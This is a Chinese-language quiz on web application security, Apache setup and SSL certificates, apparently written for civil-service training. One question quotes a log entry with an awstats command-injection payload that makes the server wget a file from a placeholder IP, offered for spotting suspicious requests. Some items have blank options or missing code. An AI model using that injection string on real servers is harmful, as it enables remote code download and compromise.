鹿先生的公務員終身學習解答

下列何者並非網站應用系統技術之一？

1. 1. PHP
2. 2. VB.Net
3. 3. Assembly
4. 4. Java

下列敘述何者錯誤？

1. 1.網站應用系統一般使用Port 80來傳輸
2. 2. IIS是網站伺服器軟體
3. 3. Apache只能在Unix上安裝
4. 4. PHP可以製作動態網頁

請檢視自下列網站伺服器紀錄，指出何為可疑的http要求？

1. 1. 10.2.3.4 - - [26/Jan/2006:09:43:40 -0700]
2. 2. 68.124.193.166 - - [09/Nov/2005:07:56:40 +0800] GET cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2011%2e22%2e33%2e44%2flisten%3b
3. 3. 12.3.3.4 - - [26/Jan/2006:09:43:37 -0700]
4. 4. 192.168.114.201

下列敘述何者錯誤？

1. 1.存放網頁應用程式的系統安裝最新系統修補程式後，便不會存有弱點。
2. 2.跨站指令碼不但影響伺服主機，甚至會導致瀏覽者受害。
3. 3. SQL injection是一種攻擊網站資料庫的手法。
4. 4.跨目錄存取是因為程式撰寫不良。

下列何者攻擊無法藉由過濾輸入參數來防禦？

1. 1. Directory listing
2. 2. SQL injection
3. 3. Cross site scripting
4. 4. Command injection

請指出下列何者不是本程式碼之問題所在？

1. 1. 未過濾變數page
2. 2. 使用include
3. 3. if沒有接else
4. 4. 這會造成跨目錄存取問題

Cross-site scripting 攻擊無法達到下列何種行為？

1. 1.強迫瀏覽者轉址
2. 2.取得網站伺服器控制權
3. 3.偷取瀏覽者cookie
4. 4.騙取瀏覽者輸入資料

下列何者為非？

1. 1.指令插入弱點甚至會被撰寫成worm進行散播，awstats便是一例。
2. 2. Cross-site scripting 也有可能遭利用，撰寫為worm。
3. 3. SQL injection 最有名的worm就是SQL Slammer
4. 4. Cookie值應該要編碼

Apache設定檔可以透過下列那個語法，將其它分散的設定檔納入？

1. 1. Source
2. 2. Link
3. 3. Insert
4. 4. Include

在Apache設定語法中，若一個Directive的開始標籤式是，請問其結束標籤如何表示？

1. 1.
2. 2. <#ABC>
3. 3.
4. 4.

請問WWW預設的Port是幾號？

1. 1. TCP/8000
2. 2. TCP/8080
3. 3. TCP/800
4. 4. TCP/80

在SSL加密流程中，以下那種KEY在網路上被加密傳遞？

1. 1. secret key
2. 2. public key
3. 3. private key
4. 4. server key

以下關於CA角色的敘述，何者是正確的？

1. 1. 產生KEY的機構
2. 2. 儲存KEY的機構
3. 3. 散佈KEY的機構
4. 4. 背書證明內容與key的機構

請問驗證證書真偽的方法是甚麼？

1. 1. 需要CA的公鑰驗
2. 2. 需要CA的公私鑰
3. 3. 自動信任
4. 4. 無法驗證

請問Apache所用的Server Key存放目錄是以下那一個？

1. 1. /etc/apache2
2. 2. /etc/apache2/ssl.crt
3. 3. /etc/apache2/ssl.key
4. 4. /etc/apache2/ssl.csr

在SSL加密流程中，以下那種KEY用來解密別的被加密傳遞的KEY？

1. 1. secret key
2. 2. public key
3. 3. private key
4. 4. server key

在預設的Apache配置下，以下那些目錄會存放在Server Root之下？

1. 1. htdocs
2. 2. conf
3. 3. logs
4. 4. modules

在預設的Apache配置下，以下那些目錄會存放在Document Root之下？

1. 1. htdocs
2. 2. cgi-bin
3. 3. icons
4. 4. modules